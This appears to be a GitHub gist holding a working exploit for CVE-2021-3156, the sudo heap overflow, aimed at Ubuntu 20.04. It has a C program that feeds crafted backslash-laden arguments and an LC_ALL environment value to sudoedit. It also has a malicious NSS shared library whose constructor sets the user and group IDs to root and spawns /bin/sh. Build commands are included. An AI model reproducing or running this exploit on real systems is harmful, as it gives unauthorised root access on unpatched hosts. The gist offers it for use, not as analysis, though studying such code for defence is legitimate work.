CVE-2021-3156-exploit
#define _GNU_SOURCE | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <string.h> | |
/* | |
author: swing @ bestswngs@gmail.com | |
swpwn-pd@ubuntu:~/glibc-2.31$ uname -a | |
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux | |
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue | |
Ubuntu 20.04.1 LTS \n \l | |
*/ | |
#define REP0(X) | |
#define REP1(X) X, | |
#define REP2(X) REP1(X) X, | |
#define REP3(X) REP2(X) X, | |
#define REP4(X) REP3(X) X, | |
#define REP5(X) REP4(X) X, | |
#define REP6(X) REP5(X) X, | |
#define REP7(X) REP6(X) X, | |
#define REP8(X) REP7(X) X, | |
#define REP9(X) REP8(X) X, | |
#define REP10(X) REP9(X) X, | |
#define REP100(X) \ | |
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X) \ | |
REP10(X) REP10(X) REP10(X) REP10(X) REP10(X) | |
#define REP1000(X) \ | |
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X) \ | |
REP100(X) REP100(X) REP100(X) REP100(X) REP100(X) | |
int main(){ | |
int obufsz = 0x190; | |
char obuf[obufsz]; | |
memset(obuf, 'B', sizeof(obuf)); | |
obuf[obufsz-2] = 0x5c; | |
obuf[obufsz-1] = 0x00; | |
char env_cont[0x1000]; | |
char env_val[0x1000]; | |
int env_valsz = 0xd0; | |
memset(env_val,'Q',8); | |
memset(env_val+8,'A',env_valsz-8); | |
env_val[env_valsz] = '\0'; | |
sprintf(env_cont,"LC_ALL=C.UTF-8@%s",env_val); | |
char *args[] = { | |
"/usr/bin/sudoedit", | |
"-s", | |
obuf, | |
"\\", | |
NULL | |
}; | |
int PAD1SZ = 8; | |
char pad1[PAD1SZ] ; | |
memset(pad1, 'C', sizeof(pad1)); | |
pad1[PAD1SZ-2]= 0x5c; | |
pad1[PAD1SZ-1]= 0x00; | |
char *extra_args[] = { | |
pad1, | |
REP1000("\\") | |
"AAA\\", | |
REP100("\\") | |
REP10("\\") | |
REP10("\\") | |
REP10("\\") | |
REP10("\\") | |
REP10("\\") | |
REP7("\\") | |
"X/X\\", | |
"a", | |
env_cont, | |
NULL, | |
}; | |
execve(args[0], args, extra_args); | |
// execvpe("./sudoedit", args, extra_args); | |
} |
#include <unistd.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
/* | |
mkdir libnss_X | |
gcc -Os -Wall -Wextra -fPIC -shared inject.c -o libnss_X/X.so.2 | |
*/ | |
static void __attribute__ ((constructor)) _init(void); | |
static void _init(void) { | |
printf("[+] getroot!\n"); | |
setuid(0); seteuid(0); setgid(0); setegid(0); | |
static char *a_argv[] = { "sh", NULL }; | |
static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL }; | |
execv("/bin/sh", a_argv); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment